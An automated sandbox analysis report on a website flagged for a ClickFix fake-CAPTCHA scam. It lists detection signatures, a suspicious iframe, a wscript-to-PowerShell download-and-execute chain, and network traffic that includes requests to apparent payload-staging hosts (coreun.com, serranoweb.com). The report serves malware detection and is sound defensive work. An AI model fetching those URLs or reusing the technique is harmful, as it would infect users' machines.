Windows Analysis Report
https://www.elevate.inc/

General Information

Sample URL:	https://www.elevate.inc/
Analysis ID:	1708637
Infos:	yarasigma

Detection

CAPTCHA Scam ClickFix

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Detect drive by download via clipboard copy & paste

Malicious sample detected (through community Yara rule)

Sigma detected: Powershell download and execute file

Suricata IDS alerts for network traffic

Yara detected CAPTCHA Scam ClickFix

Yara detected Powershell download and execute

Bypasses PowerShell execution policy

Found suspicious powershell code related to unpacking or dynamic code loading

Sigma detected: Potentially Suspicious PowerShell Child Processes

Sigma detected: PowerShell Download and Execution Cradles

Sigma detected: Script Interpreter Execution From Suspicious Folder

Sigma detected: Suspicious PowerShell Parameter Substring

Sigma detected: Suspicious Script Execution From Temp Folder

Sigma detected: WScript or CScript Dropper

Suspicious execution chain found

Suspicious powershell command line found

Tries to download and execute files (via powershell)

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Wscript starts Powershell (via cmd or directly)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

HTML page contains hidden javascript code

HTTP GET or POST without a user agent

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sigma detected: Change PowerShell Policies to an Insecure Level

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Sigma detected: PowerShell Download Pattern

Sigma detected: PowerShell Web Download

Sigma detected: Usage Of Web Request Commands And Cmdlets

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara signature match

Classification

Signatures

Phishing

Yara detected CAPTCHA Scam ClickFix

Source: Yara match	File source: 0.9.pages.csv, type: HTML
Source: Yara match	File source: 0.16.pages.csv, type: HTML
Source: Yara match	File source: 0.11.pages.csv, type: HTML
Source: Yara match	File source: dropped/chromecache_257, type: DROPPED

HTML page contains hidden javascript code

Source: https://www.elevate.inc/

HTTP Parser: Base64 decoded: {"alg":"HS256","typ":"JWT"}

Source: https://www.elevate.inc/	HTTP Parser: Iframe src: https://player.vimeo.com/video/961277965?autoplay=0&muted=1&loop=1&background=0
Source: https://www.elevate.inc/	HTTP Parser: Iframe src: https://reefe.com.au/ab/elevateinc/check/index.html
Source: https://www.elevate.inc/	HTTP Parser: Iframe src: https://td.doubleclick.net/td/rul/11308007612?random=1749250529827&cv=11&fst=1749250529827&fmt=3&bg=ffffff&guid=ON&async=1&gtm=45be5641v9177334436z89174023338za200zb9174023338&gcd=13l3l3l3l1l1&dma=0&tag_exp=101509157~102015665~103116026~103200004~103233427~103351869~103351871~104653070~104653072~104661466~104661468~104698127~104698129&u_w=1280&u_h=1024&url=https%3A%2F%2Fwww.elevate.inc%2F&label=GC8HCKaWkqIZELyBipAq&hn=www.googleadservices.com&frm=0&tiba=AI-Powered%20Benefits%20Administration%20Software%20Solutions%20%7C%20Elevate&npa=0&pscdl=noapi&auid=505595167.1749250529&uaa=x86&uab=64&uafvl=Chromium%3B134.0.6998.36%7CNot%253AA-Brand%3B24.0.0.0%7CGoogle%2520Chrome%3B134.0.6998.36&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&_tu=Cg
Source: https://www.elevate.inc/	HTTP Parser: Iframe src: https://td.doubleclick.net/td/rul/11308007612?random=1749250529836&cv=11&fst=1749250529836&fmt=3&bg=ffffff&guid=ON&async=1&gtm=45be5641v9177334436za200zb9174023338&gcd=13l3l3l3l1l1&dma=0&tag_exp=101509157~102015665~103116026~103200004~103233427~103351869~103351871~104653070~104653072~104661466~104661468~104698127~104698129&u_w=1280&u_h=1024&url=https%3A%2F%2Fwww.elevate.inc%2F&hn=www.googleadservices.com&frm=0&tiba=AI-Powered%20Benefits%20Administration%20Software%20Solutions%20%7C%20Elevate&did=dZTQ1Zm&gdid=dZTQ1Zm&npa=0&pscdl=noapi&auid=505595167.1749250529&uaa=x86&uab=64&uafvl=Chromium%3B134.0.6998.36%7CNot%253AA-Brand%3B24.0.0.0%7CGoogle%2520Chrome%3B134.0.6998.36&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dgtag.config
Source: https://www.elevate.inc/	HTTP Parser: Iframe src: https://player.vimeo.com/video/961277965?autoplay=0&muted=1&loop=1&background=0
Source: https://www.elevate.inc/	HTTP Parser: Iframe src: https://reefe.com.au/ab/elevateinc/check/index.html
Source: https://www.elevate.inc/	HTTP Parser: Iframe src: https://td.doubleclick.net/td/rul/11308007612?random=1749250529827&cv=11&fst=1749250529827&fmt=3&bg=ffffff&guid=ON&async=1&gtm=45be5641v9177334436z89174023338za200zb9174023338&gcd=13l3l3l3l1l1&dma=0&tag_exp=101509157~102015665~103116026~103200004~103233427~103351869~103351871~104653070~104653072~104661466~104661468~104698127~104698129&u_w=1280&u_h=1024&url=https%3A%2F%2Fwww.elevate.inc%2F&label=GC8HCKaWkqIZELyBipAq&hn=www.googleadservices.com&frm=0&tiba=AI-Powered%20Benefits%20Administration%20Software%20Solutions%20%7C%20Elevate&npa=0&pscdl=noapi&auid=505595167.1749250529&uaa=x86&uab=64&uafvl=Chromium%3B134.0.6998.36%7CNot%253AA-Brand%3B24.0.0.0%7CGoogle%2520Chrome%3B134.0.6998.36&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&_tu=Cg
Source: https://www.elevate.inc/	HTTP Parser: Iframe src: https://td.doubleclick.net/td/rul/11308007612?random=1749250529836&cv=11&fst=1749250529836&fmt=3&bg=ffffff&guid=ON&async=1&gtm=45be5641v9177334436za200zb9174023338&gcd=13l3l3l3l1l1&dma=0&tag_exp=101509157~102015665~103116026~103200004~103233427~103351869~103351871~104653070~104653072~104661466~104661468~104698127~104698129&u_w=1280&u_h=1024&url=https%3A%2F%2Fwww.elevate.inc%2F&hn=www.googleadservices.com&frm=0&tiba=AI-Powered%20Benefits%20Administration%20Software%20Solutions%20%7C%20Elevate&did=dZTQ1Zm&gdid=dZTQ1Zm&npa=0&pscdl=noapi&auid=505595167.1749250529&uaa=x86&uab=64&uafvl=Chromium%3B134.0.6998.36%7CNot%253AA-Brand%3B24.0.0.0%7CGoogle%2520Chrome%3B134.0.6998.36&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dgtag.config
Source: https://www.elevate.inc/	HTTP Parser: Iframe src: https://player.vimeo.com/video/961277965?autoplay=0&muted=1&loop=1&background=0
Source: https://www.elevate.inc/	HTTP Parser: Iframe src: https://reefe.com.au/ab/elevateinc/check/index.html
Source: https://www.elevate.inc/	HTTP Parser: Iframe src: https://td.doubleclick.net/td/rul/11308007612?random=1749250529827&cv=11&fst=1749250529827&fmt=3&bg=ffffff&guid=ON&async=1&gtm=45be5641v9177334436z89174023338za200zb9174023338&gcd=13l3l3l3l1l1&dma=0&tag_exp=101509157~102015665~103116026~103200004~103233427~103351869~103351871~104653070~104653072~104661466~104661468~104698127~104698129&u_w=1280&u_h=1024&url=https%3A%2F%2Fwww.elevate.inc%2F&label=GC8HCKaWkqIZELyBipAq&hn=www.googleadservices.com&frm=0&tiba=AI-Powered%20Benefits%20Administration%20Software%20Solutions%20%7C%20Elevate&npa=0&pscdl=noapi&auid=505595167.1749250529&uaa=x86&uab=64&uafvl=Chromium%3B134.0.6998.36%7CNot%253AA-Brand%3B24.0.0.0%7CGoogle%2520Chrome%3B134.0.6998.36&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&_tu=Cg
Source: https://www.elevate.inc/	HTTP Parser: Iframe src: https://td.doubleclick.net/td/rul/11308007612?random=1749250529836&cv=11&fst=1749250529836&fmt=3&bg=ffffff&guid=ON&async=1&gtm=45be5641v9177334436za200zb9174023338&gcd=13l3l3l3l1l1&dma=0&tag_exp=101509157~102015665~103116026~103200004~103233427~103351869~103351871~104653070~104653072~104661466~104661468~104698127~104698129&u_w=1280&u_h=1024&url=https%3A%2F%2Fwww.elevate.inc%2F&hn=www.googleadservices.com&frm=0&tiba=AI-Powered%20Benefits%20Administration%20Software%20Solutions%20%7C%20Elevate&did=dZTQ1Zm&gdid=dZTQ1Zm&npa=0&pscdl=noapi&auid=505595167.1749250529&uaa=x86&uab=64&uafvl=Chromium%3B134.0.6998.36%7CNot%253AA-Brand%3B24.0.0.0%7CGoogle%2520Chrome%3B134.0.6998.36&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dgtag.config

Source: https://www.elevate.inc/	HTTP Parser: No favicon
Source: https://www.elevate.inc/	HTTP Parser: No favicon
Source: https://www.elevate.inc/	HTTP Parser: No favicon
Source: https://www.elevate.inc/	HTTP Parser: No favicon
Source: https://www.elevate.inc/	HTTP Parser: No favicon
Source: https://www.elevate.inc/	HTTP Parser: No favicon
Source: https://www.elevate.inc/	HTTP Parser: No favicon
Source: https://www.elevate.inc/	HTTP Parser: No favicon
Source: https://www.elevate.inc/	HTTP Parser: No favicon

Source: https://www.elevate.inc/	HTTP Parser: No <meta name="author".. found
Source: https://www.elevate.inc/	HTTP Parser: No <meta name="author".. found
Source: https://www.elevate.inc/	HTTP Parser: No <meta name="author".. found

Source: https://www.elevate.inc/	HTTP Parser: No <meta name="copyright".. found
Source: https://www.elevate.inc/	HTTP Parser: No <meta name="copyright".. found
Source: https://www.elevate.inc/	HTTP Parser: No <meta name="copyright".. found

Source: unknown	HTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.16:49784 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 2.23.227.208:443 -> 192.168.2.16:49797 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 2.23.227.208:443 -> 192.168.2.16:49798 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 2.23.227.208:443 -> 192.168.2.16:49799 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 204.79.197.222:443 -> 192.168.2.16:49800 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 150.171.29.254:443 -> 192.168.2.16:49802 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.16:49806 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.175.173.86:443 -> 192.168.2.16:49807 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 161.97.71.23:443 -> 192.168.2.16:49808 version: TLS 1.2

Source:	Binary string: mscorlib.pdb source: powershell.exe, 00000011.00000002.1617422054.00000191692AC000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ws\dll\System.pdb source: powershell.exe, 00000011.00000002.1617280035.0000019168FB0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.pdbs\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32A source: powershell.exe, 00000011.00000002.1617422054.00000191692AC000.00000004.00000020.00020000.00000000.sdmp

Software Vulnerabilities

Suspicious execution chain found

Source: C:\Windows\System32\wscript.exe

Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Networking

Suricata IDS alerts for network traffic

Source: Network traffic

Suricata IDS: 2058473 - Severity 1 - ET MALWARE Observed ClickFix Powershell Delivery Page Inbound : 167.172.78.216:443 -> 192.168.2.16:49748

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET /AS/API/WindowsCortanaPane/V2/Suggestions?qry=r&setlang=en-CH&cc=CH&nohs=1&qfm=1&cp=1&cvid=eab34d441622486489e12b453af05ccc&ig=c7da18210cf34bfeb0f5898fe9412456 HTTP/1.1host: www.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: /accept-language: en-CHx-agent-deviceid: 01000A4109009A83x-bm-cbt: 1741339061x-bm-clientfeatures: FontV22,LightAnswers,PreviewPaneAvailable,RevStorex-bm-dateformat: dd/MM/yyyyx-bm-devicedimensions: 784x640x-bm-devicedimensionslogical: 784x640x-bm-devicescale: 100x-bm-dtz: 60x-bm-market: CHx-bm-theme: 000000;0078d7x-bm-windowsflights: FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124117A5,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66E,FX:12CDE644,FX:12D1574C,FX:12D281C4,FX:12E8312D,FX:12E85C75x-device-clientsession: DEC880747F854EE0B5C157C15870FBC2x-device-isoptin: falsex-device-machineid: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}x-device-ossku: 48x-device-touch: falsex-deviceid: 01000A4109009A83x-msedge-externalexp: d-thshld39,d-thshld42,d-thshld77,d-thshld78,d-thshldspcl40x-msedge-externalexptype: JointCoordx-positionertype: Desktopx-search-appid: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIx-se
Source: global traffic	HTTP traffic detected: GET /AS/API/WindowsCortanaPane/V2/Suggestions?qry=run&setlang=en-CH&cc=CH&nohs=1&qfm=1&cp=3&cvid=eab34d441622486489e12b453af05ccc&ig=0b66c09caa924ed98b268f9ad1c1275c HTTP/1.1host: www.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: /accept-language: en-CHx-agent-deviceid: 01000A4109009A83x-bm-cbt: 1741339061x-bm-clientfeatures: FontV22,LightAnswers,PreviewPaneAvailable,RevStorex-bm-dateformat: dd/MM/yyyyx-bm-devicedimensions: 784x640x-bm-devicedimensionslogical: 784x640x-bm-devicescale: 100x-bm-dtz: 60x-bm-market: CHx-bm-theme: 000000;0078d7x-bm-windowsflights: FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124117A5,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66E,FX:12CDE644,FX:12D1574C,FX:12D281C4,FX:12E8312D,FX:12E85C75x-device-clientsession: DEC880747F854EE0B5C157C15870FBC2x-device-isoptin: falsex-device-machineid: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}x-device-ossku: 48x-device-touch: falsex-deviceid: 01000A4109009A83x-msedge-externalexp: d-thshld39,d-thshld42,d-thshld77,d-thshld78,d-thshldspcl40x-msedge-externalexptype: JointCoordx-positionertype: Desktopx-search-appid: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIx-
Source: global traffic	HTTP traffic detected: POST /threshold/xls.aspx HTTP/1.1host: www.bing.comorigin: https://www.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: /accept-language: en-CHcontent-type: text/xmlx-agent-deviceid: 01000A4109009A83x-bm-cbt: 1741339061x-bm-dateformat: dd/MM/yyyyx-bm-devicedimensions: 784x640x-bm-devicedimensionslogical: 784x640x-bm-devicescale: 100x-bm-dtz: 60x-bm-market: CHx-bm-theme: 000000;0078d7x-bm-windowsflights: FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124117A5,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66E,FX:12CDE644,FX:12D1574C,FX:12D281C4,FX:12E8312D,FX:12E85C75x-device-clientsession: DEC880747F854EE0B5C157C15870FBC2x-device-isoptin: falsex-device-machineid: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}x-device-ossku: 48x-device-touch: falsex-deviceid: 01000A4109009A83x-msedge-externalexp: d-thshld39,d-thshld42,d-thshld77,d-thshld78,d-thshldspcl40x-msedge-externalexptype: JointCoordx-positionertype: Desktopx-search-appid: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIx-search-cortanaavailablecapabilities: Nonex-search-safesearch: Moderatex-search-timezone: Bias=-60; StandardBias=0; TimeZoneKeyName=W. Europe Standard Time
Source: global traffic	HTTP traffic detected: GET /wp-content/d5 HTTP/1.1Host: coreun.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /42/504.txt HTTP/1.1Host: www.serranoweb.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /threshold/xls.aspx HTTP/1.1host: www.bing.comorigin: https://www.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: /accept-language: en-CHcontent-type: text/xmlx-agent-deviceid: 01000A4109009A83x-bm-cbt: 1741339061x-bm-dateformat: dd/MM/yyyyx-bm-devicedimensions: 784x640x-bm-devicedimensionslogical: 784x640x-bm-devicescale: 100x-bm-dtz: 60x-bm-market: CHx-bm-theme: 000000;0078d7x-bm-windowsflights: FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124117A5,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66E,FX:12CDE644,FX:12D1574C,FX:12D281C4,FX:12E8312D,FX:12E85C75x-device-clientsession: DEC880747F854EE0B5C157C15870FBC2x-device-isoptin: falsex-device-machineid: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}x-device-ossku: 48x-device-touch: falsex-deviceid: 01000A4109009A83x-msedge-externalexp: d-thshld39,d-thshld42,d-thshld77,d-thshld78,d-thshldspcl40x-msedge-externalexptype: JointCoordx-positionertype: Desktopx-search-appid: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIx-search-cortanaavailablecapabilities: Nonex-search-safesearch: Moderatex-search-timezone: Bias=-60; StandardBias=0; TimeZoneKeyName=W. Europe Standard Time
Source: global traffic	HTTP traffic detected: POST /threshold/xls.aspx HTTP/1.1host: www.bing.comorigin: https://www.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: /accept-language: en-CHcontent-type: text/xmlx-agent-deviceid: 01000A4109009A83x-bm-cbt: 1749250584x-bm-dateformat: dd/MM/yyyyx-bm-devicedimensions: 784x640x-bm-devicedimensionslogical: 784x640x-bm-devicescale: 100x-bm-dtz: -240x-bm-market: CHx-bm-theme: 000000;0078d7x-bm-windowsflights: FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124117A5,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66E,FX:12CDE644,FX:12D1574C,FX:12D281C4,FX:12E8312D,FX:12E85C75x-device-clientsession: 2081EF9567504DF39DF84AC36885930Dx-device-isoptin: falsex-device-machineid: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}x-device-ossku: 48x-device-touch: falsex-deviceid: 01000A4109009A83x-msedge-externalexp: d-thshld39,d-thshld42,d-thshld77,d-thshld78,d-thshldspcl40x-msedge-externalexptype: JointCoordx-positionertype: Desktopx-search-appid: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIx-search-cortanaavailablecapabilities: Nonex-search-safesearch: Moderatex-search-timezone: Bias=300; DaylightBias=-60; TimeZoneKeyName=Eastern Standard Time
Source: global traffic	HTTP traffic detected: POST /threshold/xls.aspx HTTP/1.1host: www.bing.comorigin: https://www.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: /accept-language: en-CHcontent-type: text/xmlx-agent-deviceid: 01000A4109009A83x-bm-cbt: 1749250592x-bm-dateformat: dd/MM/yyyyx-bm-devicedimensions: 784x640x-bm-devicedimensionslogical: 784x640x-bm-devicescale: 100x-bm-dtz: -240x-bm-market: CHx-bm-theme: 000000;0078d7x-bm-windowsflights: FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124117A5,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66E,FX:12CDE644,FX:12D1574C,FX:12D281C4,FX:12E8312D,FX:12E85C75x-device-clientsession: 2081EF9567504DF39DF84AC36885930Dx-device-isoptin: falsex-device-machineid: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}x-device-ossku: 48x-device-touch: falsex-deviceid: 01000A4109009A83x-msedge-externalexp: d-thshld39,d-thshld42,d-thshld77,d-thshld78,d-thshldspcl40x-msedge-externalexptype: JointCoordx-positionertype: Desktopx-search-appid: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIx-search-cortanaavailablecapabilities: Nonex-search-safesearch: Moderatex-search-timezone: Bias=300; DaylightBias=-60; TimeZoneKeyName=Eastern Standard Time
Source: global traffic	HTTP traffic detected: POST /threshold/xls.aspx HTTP/1.1host: www.bing.comorigin: https://www.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: /accept-language: en-CHcontent-type: text/xmlx-agent-deviceid: 01000A4109009A83x-bm-cbt: 1749250592x-bm-dateformat: dd/MM/yyyyx-bm-devicedimensions: 784x640x-bm-devicedimensionslogical: 784x640x-bm-devicescale: 100x-bm-dtz: -240x-bm-market: CHx-bm-theme: 000000;0078d7x-bm-windowsflights: FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124117A5,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66E,FX:12CDE644,FX:12D1574C,FX:12D281C4,FX:12E8312D,FX:12E85C75x-device-clientsession: 2081EF9567504DF39DF84AC36885930Dx-device-isoptin: falsex-device-machineid: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}x-device-ossku: 48x-device-touch: falsex-deviceid: 01000A4109009A83x-msedge-externalexp: nullx-msedge-externalexptype: JointCoordx-positionertype: Desktopx-search-appid: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIx-search-cortanaavailablecapabilities: Nonex-search-safesearch: Moderatex-search-timezone: Bias=300; DaylightBias=-60; TimeZoneKeyName=Eastern Standard Timex-userageclass: Unknownaccept-encoding: identity
Source: global traffic	HTTP traffic detected: POST /threshold/xls.aspx HTTP/1.1host: www.bing.comorigin: https://www.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: /accept-language: en-CHcontent-type: text/xmlx-agent-deviceid: 01000A4109009A83x-bm-cbt: 1749250592x-bm-dateformat: dd/MM/yyyyx-bm-devicedimensions: 784x640x-bm-devicedimensionslogical: 784x640x-bm-devicescale: 100x-bm-dtz: -240x-bm-market: CHx-bm-theme: 000000;0078d7x-bm-windowsflights: FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124117A5,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66E,FX:12CDE644,FX:12D1574C,FX:12D281C4,FX:12E8312D,FX:12E85C75x-device-clientsession: 2081EF9567504DF39DF84AC36885930Dx-device-isoptin: falsex-device-machineid: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}x-device-ossku: 48x-device-touch: falsex-deviceid: 01000A4109009A83x-msedge-externalexp: nullx-msedge-externalexptype: JointCoordx-positionertype: Desktopx-search-appid: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIx-search-cortanaavailablecapabilities: Nonex-search-safesearch: Moderatex-search-timezone: Bias=300; DaylightBias=-60; TimeZoneKeyName=Eastern Standard Timex-userageclass: Unknownaccept-encoding: identity

Source: unknown	TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown	TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown	TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown	TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown	TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown	TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown	TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown	TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown	TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown	TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown	TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown	TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown	TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown	TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown	TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown	TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown	TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown	TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown	TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown	TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown	TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.227.208
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.227.208
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.227.208
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.227.208
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.227.208
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.227.208
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.227.208
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.227.208
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.227.208
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.227.208
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.227.208
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.227.208
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.227.208
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.227.208
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.227.208
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.227.208
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.227.208
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.227.208
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.227.208
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.227.208
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.227.208
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.227.208
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.227.208
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.227.208
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.227.208

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1host: www.elevate.incsec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"upgrade-insecure-requests: 1user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7sec-fetch-site: nonesec-fetch-mode: navigatesec-fetch-user: ?1sec-fetch-dest: documentaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=0, i
